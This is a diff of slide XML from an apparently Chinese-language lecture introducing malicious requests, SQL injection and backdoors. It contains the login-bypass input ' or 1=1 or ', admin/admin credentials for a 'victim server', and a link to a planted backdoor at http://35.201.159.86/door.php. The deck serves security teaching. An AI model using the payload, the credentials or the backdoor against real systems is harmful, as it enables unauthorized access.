-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>Malicious packet)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>惡意請求</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Malicious request)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1025986437"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{146C3F74-268E-4B66-8B47-F90B6077559A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>資料庫隱碼攻擊 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>SQL INJECTION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA69D91D-E907-4597-8E41-6313F813BE23}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>概念</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>讓資料被執行</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>舉例</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>沒魚蝦也好</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>沒魚蝦，也好</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>沒魚，蝦也好</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497812298"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F6AB60-A92A-4E7C-9887-86CCC5FED8A1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>資料庫隱碼攻擊 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>SQL INJECTION</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C97741-7E9D-422C-9947-056A637E89F3}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>受害者伺服器</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Victim Server)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>帳號密碼</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>admin/admin</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              </a:rPr>
-              <a:t>‘ or 1=1 or ‘</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1733715017"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009A4191-8546-4753-B6B7-1268854A10A1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>後門 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>Backdoor</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084076D5-F692-49AA-A19F-39296E528CB0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{084076D5-F692-49AA-A19F-39296E528CB0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5096,7 +3375,7 @@
           <p:cNvPr id="1026" name="Picture 2" descr="你知道為什麼8天都沒有習近平的消息嗎？ 因為你的腦波全被他控制了">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065AEC4D-6332-480C-BB94-BF9E40028754}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{065AEC4D-6332-480C-BB94-BF9E40028754}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5148,6 +3427,2072 @@
   <p:clrMapOvr>
     <a:masterClrMapping/>
   </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F2E0D687-7D54-4270-9C3A-1FD9F27FAC53}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>後門 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>Backdoor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EEEEEDEB-C593-4938-A8AF-731282DAF81B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>受害者伺服器</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Victim Server)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>後門已經先植入好</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>了</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>35.201.159.86/door.php</a:t>
+            </a:r>
